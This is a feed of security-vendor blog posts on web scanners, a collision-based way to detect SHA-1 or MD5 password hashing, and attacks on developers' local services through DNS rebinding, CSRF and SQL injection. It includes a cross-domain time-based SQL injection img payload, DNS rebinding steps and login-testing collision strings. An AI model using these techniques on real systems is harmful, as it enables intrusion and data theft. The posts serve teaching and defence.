Quantcast
Channel: Invicti
Viewing all 1027 articles
Browse latest View live

The Advantage of Heuristic Over Signature Based Web Vulnerability Scanners

$
0
0

There are two different kinds of web application vulnerability scanners; heuristic and signature based scanners. This article explains how both types of scanners work and what type of vulnerabilities they can find in web applications.

How Do Signature Based Web Application Security Scanners Work?

Signature based scanners rely on a database of signatures for known vulnerabilities. Therefore for a scanner to recognize a vulnerability, a signature for that specific vulnerability has to be added to its database first.

This means that these scanners need to be updated regularly, because an update is released every time a new vulnerability is found in a specific web application. Usually, signature based scanners do not run any additional security checks to determine whether or not the detected vulnerability is exploitable. Their checks rely only on a number of non reliable criteria, such as the version details and numbers of the target web application, file paths and directory structures etc.

This means that signature based web security scanners are more prone to reporting false positive vulnerabilities. For example, if a patch is applied manually to a web application without changing the version file, a signature based scanner will report a false positive. This also means that signature based scanners can only scan known and off-the-shelf web applications such as WordPress, Joomla! and Drupal.

A popular signature based scanner is WPScan, which scans WordPress websites and its plugins and themes for known vulnerabilities. Another popular signature based scanner is Nikto, which scans for server misconfigurations and dangerous files.

How Do Heuristic Web Application Security Scanners Work?

Heuristic web vulnerability scanners do not need a database to detect vulnerabilities. They do not rely on signatures of already discovered security bugs. They are able to determine if a web application is vulnerable by actively probing for vulnerability classes, such as Cross-site Scripting (XSS) and SQL Injection vulnerabilities.

This means that heuristic web vulnerability scanners are able to find 0-day vulnerabilities in a web application, unlike signature based scanners. And heuristic web application security scanners do not need to be updated as often as signature based ones and can scan and find vulnerabilities in any type of off-the-shelf and custom built web applications and web services.

Netsparker, our dead accurate web application security scanner is a heuristic scanner.

Examples of 0-day Vulnerability Identified by a Heuristic Web Vulnerability Scanner

As part of our regular testing of the Netsparker web application scanner, we scan an ever changing list of open source web applications. In the last few years, Netsparker identified thousands of zero-day vulnerabilities in such web applications, and as of today, we have published over 150 advisories. We do not publish an advisory for every vulnerability we discover because of a number of reasons, and that is why the number of advisories is less than the number of identified vulnerabilities.

A few good examples of a number of 0-day issues Netsparker identified are:

All of the above vulnerabilities were not previously known, therefore a signature based scanner would not have warned the user about them.

Using Both Signature Based & Heuristic Web Vulnerability Scanners

Clearly a heuristic web security scanner can do much more than a signature based scanner in terms of security, but don’t sign off signature based scanners either. They also have their advantages.

For example, if you want to scan a WordPress website for known vulnerabilities and security weaknesses, the signature based scanner WPscan will definitely do a very good job and can deliver the scan results very fast. In such cases, a heuristic scanner is an overkill. However, to scan a complex custom application for unknown security bugs, you should use a heuristic web application security scanner such as Netsparker.


June 2017 Update of Netsparker Desktop

$
0
0

A few weeks ago we released update 4.9.0.15101 of Netsparker Desktop web application security scanner. This update is a major one, we have included a good number of new web security checks, new features and also a good number of improvements and bug fixes.

Read this blog post for an overview of what is new and improved. For a more detailed list please refer to the Netsparker Desktop changelog.

New Web Security Checks

Referrer Policy Security Checks

The Referrer Policy, a W3C Candidate Recommendation since January of this year, is used by web applications to control the value used in the Referer HTTP header. The Referer HTTP header, which is sent with a HTTP request contains the URL of the previously browsed page.

During a web vulnerability scan, the Netsparker scanner checks if the web application is setting the correct Referrer Policy, to ensure that for example no information is leaked during cross-site, or when navigating from a HTTPS to a HTTP site. There are several other Referrer Policy security checks that Netsparker does during the scan, and the above is just an example.

Referrer Policy security checks that Netsparker does during the scan.

Other Web Security Checks

In this update, we also included several other security checks, such as:

New Features in Netsparker Desktop

Below is just an overview of some of the new features in Netsparker Desktop web application security scanner:

  • Improved Netsparker’s Proxy: The Netsparker proxy that is used during a manual crawl of a web application has been rewritten and now it supports protocols such as TLS 1.1 and 1.2.
  • Hex Editor in Request Builder: Now you can view a HTTP request in the HTTP Request Builder in Hex format.

Hex Editor in Request Builder: Now you can view a HTTP request in the HTTP Request Builder in Hex format. 

  • New attacking optimization option for parameters that are shown on multiple pages: Web pages are made up of a number of components, such as a search widget, a newsletter subscription form and some other forms. Such components are used on multiple pages and by default the scanner will attack the component’s parameter every time it crawls it through a different page, thus slowing down the scan. In the new update of Netsparker, we introduced a new option Optimize Attacks to Recurring Parameters which you can enable and configure a limit of how many times the scanner attacks the same parameter, even when crawled through different pages.  

 Optimize Attacks to Recurring Parameters which you can enable and configure a limit of how many times the scanner attacks the same parameter, even when crawled through different pages.

  • New CSRF Settings in Scan Policy: We have added a new CSRF node in the Scan Policy Editor in which you can specify the name of a form, action or component that should not be checked for CSRF checks. Since search forms or forms with CAPTCHA cannot be vulnerable to CSRF, you can exclude them to optimize the scan speed and duration. So in this option, you can specify the CAPTCHA indicators etc, as seen in the below screenshot.

New CSRF node in the Scan Policy Editor in which you can specify the name of a form, action or component that should not be checked for CSRF checks.

  • Site Profile Knowledge Base Node: In the new Site Profile knowledge base node you will find information about the target website, such as the Operating System of the web server, the web server software etc.

 New Site Profile knowledge base node, here you will find information about the target website, such as the Operating System of the web server, the web server software etc.

Other New Features and Improvements

Apart from the above, we have included several other new features and improvements in the latest update of the dead accurate web application security scanner, such as:

  • Improved the parsing of JavaScript and CSS resources,
  • Added proof of exploitation for XXE vulnerabilities,
  • Improved the WSDL (web services) parsing,
  • Improved the highlighting of patterns in HTTP responses,
  • Improved the Local File Inclusion vulnerability detection checks,
  • And many others!

For a detailed and complete list please refer to the changelog. You will be prompted that an update of Netsparker Desktop is available the next time you start the scanner. Should you need any assistance with the update, or have any questions do not hesitate to get in touch.

Collision Based Hashing Algorithm Disclosure

$
0
0

In February 2017 a number of Google Engineers created the first SHA-1 collision. Even though this hashing algorithm has already been marked as deprecated by NIST in 2011, it is still widely used.

 

What are Hash Collisions?

A hash collision happens when two different cleartext values produce the same hash value. Collisions can lead to a wide range of problems, but we won't cover them within this article. 

Instead, in this blog post we will take a look at another side effect of collisions; a method that allows you to detect whether or not a website uses weak hash functions. This can be done without having access to the source code.

To make it easy to remember we are referring to this method as Collision Based Hashing Algorithm Disclosure.

Example of a Hash Collision

The collision the Google engineers identified allows anybody to create two PDF files, with different content but with the same hash. Let’s take a look at both of the cleartext values Google used:

255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017346DC9166B67E118F029AB621B2560FF9CA67CCA8C7F85BA84C79030C2B3DE218F86DB3A90901D5DF45C14F26FEDFB3DC38E96AC22FE7BD728F0E45BCE046D23C570FEB141398BB552EF5A0A82BE331FEA48037B8B5D71F0E332EDF93AC3500EB4DDC0DECC1A864790C782C76215660DD309791D06BD0AF3F98CDA4BC4629B1

255044462D312E330A25E2E3CFD30A0A0A312030206F626A0A3C3C2F57696474682032203020522F4865696768742033203020522F547970652034203020522F537562747970652035203020522F46696C7465722036203020522F436F6C6F7253706163652037203020522F4C656E6774682038203020522F42697473506572436F6D706F6E656E7420383E3E0A73747265616D0AFFD8FFFE00245348412D3120697320646561642121212121852FEC092339759C39B1A1C63C4C97E1FFFE017F46DC93A6B67E013B029AAA1DB2560B45CA67D688C7F84B8C4C791FE02B3DF614F86DB1690901C56B45C1530AFEDFB76038E972722FE7AD728F0E4904E046C230570FE9D41398ABE12EF5BC942BE33542A4802D98B5D70F2A332EC37FAC3514E74DDC0F2CC1A874CD0C78305A21566461309789606BD0BF3F98CDA8044629A1

Those two strings are hex encoded, and once you decode them both will result in the same SHA-1 sum once hashed:

f92d74e3874587aaf443d1db961d4e26dde13e9c

Introducing Collision Based Hashing Algorithm Disclosure

Hashing Algorithms in Web Applications

When you register to an online service, the majority of websites will hash your password and store the hash in the database. This is good practice since it allows the web application to store your password in a form that doesn't allow a potential attacker to view it in plain text, should he gain access. However, to be effective a strong hashing algorithm has to be used. This means that algorithms like SHA-1 and MD5 are not suitable for that kind of application. Nonetheless, nowadays they are often used by developers to hash passwords. 

When you try to login to the website, the password hash stored in the database is compared to the hash generated on the fly from the password you submit in the login form. Therefore if the target web application uses SHA-1 hashing algorithm, and we supply our collisionstrings, the hash will be the same. This also means that we can login using two different strings/passwords.

By using the same technique in a black box fashion, we can determine whether or not a web application uses a vulnerable hashing algorithm, as explained below.

How Does the Collision Based Hashing Algorithm Disclosure Work?

The Theory Behind the Attack

In theory, it is very simple. Create an account on the web application that you would like to test. As a password use a string that produces the same hash as another different string. Once the account is registered, try to login again. This time supply the different string that produces the same hash as the password. If you manage to login, it means that the target web application uses the SHA-1 algorithm.

Example of Collision Based Hashing Algorithm Disclosure

Let's assume that when you register a new user on a web application, it uses the cleartext1 string that you supplied as password and hashes it. As seen below, the hashed password would result in the hash abcd (simplified), which is then stored in the database:

hash(cleartext1) == ‘abcd’

Note: To keep things simple we will not take salts, a random string that’s concatenated with the password to make it more secure against certain types of attacks into consideration.

The web application stores the hash generated from that process in the database. When you try to log back into the web application, the same hashing algorithm is applied to the password you supply in the login form. This hash is then compared to the one in the database and if they match you will log in.

So let’s assume that to login now you used cleartext2 as password, and when the web application hashes it using the SHA-1 algorithm, the same hash is produced:

hash(cleartext2) == ‘abcd’

When the web application compares the hashed password with the hash that was stored in the database, they will match and you will log in.

hash(password) == dbhash

However, this method has a few limitation and it won’t work if:

  • Strict server side password length restrictions are used in the registration and login forms, for example, a maximum password length of 20 characters is enforced.
  • If there is a whitelist of allowed characters,
  • If there is a salt prepended (not appended).

How To Check if a Web Application Uses SHA-1 Hashing Algorithm

Below is a step by step explanation of how you can check if a web application uses the SHA-1 hashing algorithm.

  1. Setup an interception proxy, such as the one in Netsparker Desktop and configure the web browser to proxy the requests through it.
  2. Register an account on the web application and use a recognizable password such as !!PASS!! so it is easy to find when you intercept the HTTP request.
  3. Edit the registration request in the interception proxy by replacing all occurrences of the !!PASS!! string with the first collision string (converted to URL encoding) from the above example.

Interception of the user registration HTTP request with a proxy.

NOTE: To URL encode the collision strings you have to place a % character in front of every encoded byte. You can use the below PHP code to do it:

implode(array_map(function($byte){ return '%' . $byte;},str_split($collisionstring,2)));

  1. Once you send the request to the web application, it will generate a hash and stores it in the database. If the web application uses the SHA-1 algorithm the hash will be f92d74e3874587aaf443d1db961d4e26dde13e9c
  2. Now try to login to the web application using the !!PASS!! string as password again.
  3. Intercept the login HTTP request and replace all occurrences of !!PASS!! with the URL encoded version of the second string.
  4. The web application will hash your supplied password and compares it to the stored value in the database. Once again the hash should be f92d74e3874587aaf443d1db961d4e26dde13e9c.

If the web application uses the SHA-1 hashing algorithm, even though you supplied a different value you will login.

Results Expectations

If you do not manage to login because the passwords do not match, then the web application uses a hashing algorithm other than SHA-1 is used.

If you manage to login to the web application it means that the SHA-1 hashing algorithm is used for password hashing.

Does This Collision Based Hashing Algorithm Disclosure Work for SHA-1 Algorithm Only?

This method will also work with other hashing algorithms that have known collisions, for example, MD5. The prerequisites don’t differ much. However, the length restriction is less of a concern as the known md5 collisions are not as long. They are just 64 bytes. This might still be too long for some server side filtering though.

Here is a known MD5 collision which you can use for testing:

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2

Both strings will result in the following hash:

008ee33a9d58b51cfeb425b0959121c9

Who Needs to Know about the Collision Based Hashing Algorithm Disclosure?

As a developer of a website you already know which hashing algorithm you use and do not need this test to see if your algorithm is secure or not. Just knowing which hashing algorithm is used also won’t aid an attacker during an attack.

However, there are two scenarios where this is especially useful: during a black box penetration test, where it is not possible to get a look at the source code, and as an additional step to check the authenticity of a database dump.

If a leaked database uses unsalted SHA-1 hashes and this method confirms that indeed SHA-1 is the hashing algorithm used by the website, it can be a very small indicator that the dump might be credible.

The URL encoded strings

For easy copying here are the URL encoded strings for the above check:

SHA-1

String 1

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1

String 2

%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1

MD5

String 1

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

String 2

%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

Netsparker Sponsors BSides Manchester 2017

$
0
0

Artwork for BSides Manchester 2017 which can be found on the website.

We are happy to be sponsoring BSides Manchester, which will be held on the 17th of August. During the conference, we will be exhibiting our dead accurate web application security scanner.

The previous BSides Manchester events were a great success and we are excited to be a part of such a worthy conference this year. BSides Manchester was created due to the need for a second BSides in the UK. After all, the UK has one of the largest security communities in the world and this should be celebrated. So if you're in the region, make it a point to attend.

The venue for BSides Manchester is the Manchester Metropolitan University Business School, which is based on the All Saints campus.

For more information, visit the BSides Manchester website where you can find out more about the event and how to support it.

For the latest news on BSides Manchester 2017, follow them on Twitter @BSidesMCR and Facebook.

Come by our Exhibition Space While at BSides Manchester 2017

If you are attending BSides Manchester 2017, then come and visit us at our Exhibition Space. We will be more than happy to answer any questions you might have about web vulnerability scanning and Netsparker.

Discussing Web Vulnerability Scanning in Continuous Integration on Enterprise Security Weekly

$
0
0

The earlier in the development process a vulnerability is found, the easier and cheaper it is to fix. For example, imagine a vulnerability is found during a penetration test in four or five month old code. It is very difficult for your developers, if they are still the same ones, to go back and understand the logic and the code that they have written five months before.

It can be even worse. A web developer introduces a vulnerability with his new code, but since no one is pointing it out to him he keeps on using similar code for the next few months. So over a few months, he can introduce a handful of vulnerabilities.

That’s why it is important to integrate automated web application security scanning in your continuous integration. Automated scanning does not replace the need for penetration tests, but it definitely helps to streamline the web development process, as Ferruh Mavituna well explained during episode 53 of Enterprise Security Weekly.

Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls

$
0
0

Software and web developers, owners of the latest IOT gadgets and people who just like to surf the web at home have one thing in common, they are all protected by a firewall.

Businesses typically protect their networks with hardware, dedicated and robust firewalls, while home users usually have it built in their routers. Firewalls are essential for internet security, since they prevent anyone from the outside to access the internal network, and possibly sensitive data. However, firewalls are no panacea. In some cases, malicious hackers can still attack a vulnerable web application that is hosted behind a firewall.

In this blog post, we will explain the different methods attackers can use to access vulnerable web applications behind firewalls, and we will also explain what countermeasures can be taken to thwart such attempts.

Table of Content

A Typical Web Application Developer’s Test Setup

As a web application developer it is impossible to write code without having a proper testing environment. Fortunately, it is easy to install all the necessary pre-configured applications typically used for testing, so the majority of the developers run a web server on their machine.

For windows, there are popular applications such as XAMPP, which installs Apache, MySQL and PHP, a common combination for web development. On Linux, this can be easily done by installing the needed packages using a package manager. Both methods have the advantage that Apache is preconfigured to a certain degree. Though in order to prevent the Apache web server from being publicly accessible, developers have to configure it to listen on 127.0.0T.1:80 instead of 0.0.0.0:80, or else use a firewall to block incoming connections. But is this enough to block incoming connections and possible malicious attacks in a testing environment?.

Protected Test Web Server & Applications Are Still Vulnerable to Malicious Attacks

Unfortunately many assume that the security measures mentioned above are enough to prevent anyone from sending requests to the web applications running on the test Apache web server. It is assumed that this form of Eggshell Security, hardened from the outside but vulnerable on the inside, allows them to run vulnerable test applications.

People also often assume that they are safe, even if a vulnerable or compromised machine is in the same network as long as it does not contain personal data. However, it is still possible for an attacker to tamper with files or databases, some of which are typically later used in production environments. Attackers can also probe the internal network for weaknesses. In some cases, it is even possible to use methods like ARP-Spoofing to carry out Man-In-The-Middle (MITM) attacks.

But how can an attacker gain access to the development environment, when it is correctly configured to only listen on the loopback interface? Or even better, it is not even accessible from the outside because of a firewall, or because it only allows whitelisted access from within the internal network? The answer is simple: Through the developer’s web browser.

Attacking the Developer’s Vulnerable Test Setup Through the Web Browser

Logo of Google Chrome Logo of Microsoft Edge Logo of Mozilla Firefox Logo of Safari

Web browsers are considered to be the biggest attack surface on personal computers; their codebase and functionality is steadily growing and through the years there have been some notoriouslyinsecure browsers and plugins.  Attackers also tend to target browsers due to shortcomings in the design of some modern protocols and standards. Most of them have been built with a good intention, but can also lead to serious vulnerabilities and easy exploitation cross domain. For example, in some cases it is even possible to use the victim’s browser as a proxy and tunnel web request through it.

But new technologies are not the only problem with web browsers security. There are much older issues. For example one of the issues that has the biggest impact is the fact that every website is allowed to send data to any other accessible website. Contrary to popular belief, Same Origin Policy does not prevent the sending of data to a website. It only prevents browsers from retrieving the response. Therefore attacker.com can easily send requests to 127.0.0.1 and that is obviously a big problem.

In this article, we are going to explain how malicious attackers can execute a number of browser based attacks to retrieve data from the victim’s computer, which could be sitting behind a firewall or any other type of protection.

Vulnerable Test Websites on a Local Machine

The problem with Vulnerable Test Environments

http://localhost/

Security researchers and developers typically run vulnerable applications on their machines. For example, developers typically have web applications that are still in development stage, and maybe the security mechanisms are not in place yet, such as the CSRF tokens or authentication.

Security researchers have the same type of applications running on their computers. It is their job to find security issues so they are typically testing vulnerable web applications, which make them an easy target for these kinds of exploits.

Since the Same Origin Policy (SOP) prevents the attacker from mapping the web application to search for vulnerabilities, he has two possibilities to attack the victim;

  1. Use a blind approach, during which the attacker has to brute force file and parameter names,
  2. Use a method with which he can actually view and explore the web application. This is where methods such as DNS rebinding come into play.

DNS Rebinding Attack

Image for a DNS Rebinding Attack

This attack method is simple and allows attackers to easily retrieve information from the victim’s computer if it is running a webserver. During this attack the malicious hacker exploits the web browser’s DNS resolution mechanism to retrieve information from the /secret/ subdirectory on the server, as explained below:

  1. The attacker sets up a website on a live domain, for example, attacker.com that is hosted on the IP address 11.22.33.44.
  2. The attacker configures a very short DNS cache time (TTL, time to live) for the FQDN record.
  3. He serves a malicious script to the victim that when executed sends any data it finds back to the attacker controlled server every few minutes.
  4. The attacker changes the IP address of the FQDN attacker.com to 127.0.0.1.
  5. Since the TTL was set to a very short time, the browser tries to resolve the IP address of attacker.com again when executing the script that is trying to get the content from the /secret/ sub directory. This needs to be done with a delay of about one minute to let the browser's DNS cache expire.
  6. Since the script is now running and the IP address of attacker.com is now set to 127.0.0.1, the attacker’s script effectively queries the content of 127.0.0.1/secret instead of 11.22.33.44/secret, thus retrieving the data from the victim’s /secret/ sub directory.

It is very difficult for the victim to identify this type of attack since the domain name is still attacker.com. And since the malicious script runs on the same domain, it also partially bypasses the Same Origin Policy.

DNS Rebinding is a Preventable Attack

DNS Rebinding attacks can be prevented at web server level. We will talk more about prevention at the end of this article, but here is a little overview; as a developer, you should use FQDNs on your local web server such as local.com and whitelist those host headers, so any HTTP requests that do not have the host header in them can be rejected.

Shared hosting is prone to DNS Rebinding only to a certain degree. This is due to the fact that the web server determines which of the websites to server based on the host header. If the host header is not known to the web server it will return the default website. So in this scenario, only the default host is vulnerable to such attack.

Same Origin Policy is not completely bypassed

Since this is an entirely new domain that the user visited, and only the IP address matches, it is not possible for the attacker to steal session information. Cookies are tied to a specific hostname by the browser, not to an IP address. This means that a cookie for http://127.0.0.1 is not valid for http://attacker.com even though it points to 127.0.0.1.

However, in many cases, a valid cookie is not needed, for example when a security researcher has a web application that is vulnerable to command injection vulnerability and no authentication is required. In such a case, the attacker can either use DNS rebinding or simple CSRF (once he knows the vulnerable file and parameter) to issue system commands.

Do Not Run Unpatched Web Applications on Local Machines - It is Dangerous

It is worth mentioning that there are many reasons why even non-developer users tend to have outdated software on the local network. It could be either because they forgot to update the software, or they do not know that an update is available. Many others do not update their software to avoid having possible compatibility issues.

The method we will be describing now is convenient if there are known vulnerable web applications on the victim’s computer. We showed earlier how it is possible to identify and brute force WordPress instances in local networks using a technique called Cross Site History Manipulation, or XSHM. With XSHM it is possible to retrieve information about running applications and under some circumstances, one can even get feedback whether or not a CSRF attack has succeeded.

This method is too evident to be used for brute force attacks or to scan local networks since it requires a refreshing window or redirects. However, it can be done stealthily for short checks since multiple redirects are not strange to modern websites. Legitimate reasons for those are oauth implementations or ad networks that redirect users to different domains.

So it is possible to quickly identify which CMS or web application is running on a given host. If there are known vulnerabilities an attacker can use a known exploit and send the data back to himself, either by using javascript with DNS rebinding, Out Of Band methods, or other Same Origin Breaches.

SQL injection Vulnerabilities on Your Local Network

Image for SQL injection vulnerabilities.

Imagine a Web Application is vulnerable to a SQL injection vulnerability in a SELECT statement that is only exploitable through a CSRF vulnerability, and the attacker knows that an ID parameter in the admin panel is vulnerable. The application runs with the least privileges needed to successfully retrieve data. An attacker cannot use an out of band method on MySQL without root privileges since stacked queries do not work in such setup. Also, the attacker cannot just insert an INSERT statement right behind the query.

However, he can use the sleep command, which forces the SQL database to wait for a given amount of seconds before it continues to execute the query when combined with a condition. So for example, the attacker issues a command such as the following:

if the first character of the admin password is “a” sleep for 2 seconds.

If the request above takes less than two seconds to complete, then the first character in the password is not an “a”. The attacker tries the same with the letter “b”. If the request takes two seconds or longer to complete, then the first character of the password is “b”. The attacker can use this method to guess the remaining characters of the password.

This type of attack is called time based blind SQL injection. However, in the above scenario, it does not seem like a useful attack because the attacker cannot issue the requests directly, but has to resort to CSRF. Also, the delay can only be detected in the user's browser with a different page loading time.

Exploiting SQL injection Vulnerabilities Cross-Domain

JavaScript can be used to determine whether a page finished loading or not by using the “onload” or the “onerror” event handler. Let’s say the attack is GET based (even though POST is also possible) and the vulnerable parameter is called ID. The attacker can:

1. Record the time it takes for a page to load.

2. Point an img tag to the vulnerable application, e.g.

<img src = “http://192.168.1.123/admin.php?page=users&id=1+AND+IF+(SUBSTRING(DATABASE(),1,1)+=+'b',sleep(2),0)” onerror = “pageLoaded()”>

3. Record the time after the page finishes loading with pageLoaded().

4. Compare the values from step 1 and 3.

If there are two or more seconds difference in loading time, it means that the attack was successful and the first letter of the database is a “b”. If not, the attacker proceeds with the letters “c”, “d”, “e” and so on until there is a measurable time delay. Due to this timing side channel it is possible to leak page loading times and therefore, in combination with an SQL injection, valuable data.

Strong Passwords Are a Must, Even if The Web Application Is Not Public

Image for a password.

People tend to use weak passwords on web applications that are running on machines behind a firewall. Though that’s a wrong approach. Let’s say an attacker managed to compromise another computer in the same local network. If he notices a web application on another host he will try to brute-force the password for the admin panel. And if he guesses the credentials, since many modern web applications have upload functionality, the attacker can upload malicious files. Therefore an attacker is often able to plant a web shell on the server and issue commands on the machine hosting the web application.

But as mentioned above there does not need to be a compromise prior to the brute forcing. With DNS rebinding it is still possible to brute force the web application from a malicious website with a low latency, since the web application already runs on localhost and the requests do not need to go over the web.

Therefore it is important to always use strong passwords, no matter from where the application is accessible.

Insecure phpMyAdmin Instances Can Be Dangerous

Logo for phpMyAdmin, a very popular MySQL manager.

phpMyAdmin, a very popular MySQL manager is often installed on developer’s machines, and unfortunately, most of them are not secure. For example, on some install scripts MySQL and phpMyAdmin do not use authentication or use a blank password by default. This means that it is very easy to exploit this through DNS rebinding as no prior knowledge of a password is required to issue MySQL commands.

What makes phpMyAdmin especially dangerous is that it often runs with the highest possible privileges - as the MySQL root user. This means that once an attacker gains access to it, he can:

  • Extract data from all databases
  • Read Files
  • Write files

In some configurations of MySQL, the file privileges are only allowed inside a specific directory. However, more often than not this security measure is not applied, especially in older versions. Therefore an attacker can read files and write attacker controlled content into the web root, which means he can plant a web shell, or a small script that allows him to issue system commands. Once he manages to do that most probably he will be able to escalate his privileges and place malware on the system or exfiltrate sensitive data.

Typical Vulnerable Devices Found On a Network

Routers Need To Be Kept Up To Date

Web applications are not the only objects at risk on a network. Devices such as routers can also be targeted, mainly because they have a web interface which typically runs with root privileges. Routers tend to be a popular and easy target because:

  • Web interfaces are poorly coded.
  • They sometimes have backdoors or remote controlled interfaces with standard passwords that users never change.
  • Since storage space is often tight on routers, manufacturers often use old and probably vulnerable versions of a software, as long as it serves the purpose.

In cases where routers’ admin web portal is not available from the outside, attackers can use DNS rebinding to log into the routers and hijack them. Such type of attacks are possible though they are not scalable, like the 2016 MIRAI malware infection. It infected thousands of home routers by using the default telnet password to gain admin access on the routers and add them to large botnets. Routers are typically hacked for a number of reasons, here are just a few:

  1. They can be used for Distributed Denial of Service (DDoS) attacks.
  2. Attackers can use them in a Man In The Middle attack (MITM) to intercept the traffic that passes through them.
  3. Attackers use them as a foothold to gain access to other machines on the router’s network, like what happened in the NotPetya ransomware in June 2017.

IOT Devices - Many of Which, Are Insecure

IOT Devices - Many of Which, Are Insecure

MIRAI did not only target home routers. Other victims included IP cameras and digital video recorders. More often than not security does not play an important role in the design of Internet Of Things (IOT) devices. And we install such insecure products on our home and corporate networks.

And to make things worse, many people who do not have IT security experience, tend to disable all firewalls and other security services on them to make the IOT devices, such as an IP camera, available over the internet. These types of setups can have unpredictable outcomes for the security of the devices connected to our networks, and can be an open door invitation to attackers and allow them to target other parts of the systems.

Vulnerability NAS Servers

NAS servers have become very common nowadays. They are used to manage and share files across all the devices on a network. Almost like any other device, NAS servers can be configured via a web interface, from which users for example, are allowed to download files.

NAS servers are also an additional attack surface. Similar to what we explained above, the attacker can use CSRF or DNS rebinding attack to interact with the web interface. Since these web interfaces typically have root access to allow the user to change ports etc, once an attacker gains access he can easily fully compromise the server.

Vulnerable Services Typically Used By Developers

Misconfigured MongoDB Services

Logo for MongoDB Services

On the rare occasion or a properly set up MongoDB instances to bind on localhost instead of 0.0.0.0, they can still be vulnerable to attacks through their REST API. The REST API is typically enabled because it is a useful feature for frontend developers. It allows them to have their own test datasets without having to rely on a finished backend. The data is returned in JSON format and can therefore be used with native JavaScript functions.

However this web interface has some serious flaws like CSRF vulnerabilities, that can lead to data theft as described in this proof of concept of a CSRF attack in the MongoDB REST API. In short, we used an OOB (Out of band) technique to exfiltrate the data over DNS queries. The API is marked as deprecated, however it was still present in the latest version we tested at the time we wrote the article.

DropBox information Disclosure

Logo for DropBox

Another rather interesting vulnerability is the one we found in the dropbox client for Windows. In order to communicate with the client, the website dropbox.com was sending commands to a websocket server listening on localhost.

However, by default websockets allow anyone to send and receive data, even when the request originates from another website. Therefore to verify the origin, the Dropbox client uses a handshake that needs to be correct in order to verify the sender's origin.

It consisted of a check of a nonce, a string of characters only known to dropbox and the client. It was directly queried from the Dropbox server and there was probably a check for the origin header. This means that a connection can take place, but no data could be sent from localhost if the origin was not correct.

However, when any random website connects to the websocket server on localhost, the Dropbox client would prematurely send a handshake request. The handshake request included information such as the id of that particular request, which OS was in using, and the exact version of the dropbox application. Such information should not be leaked through such channel, especially since it could be read by any third party website just by starting a connection request to the server on localhost.

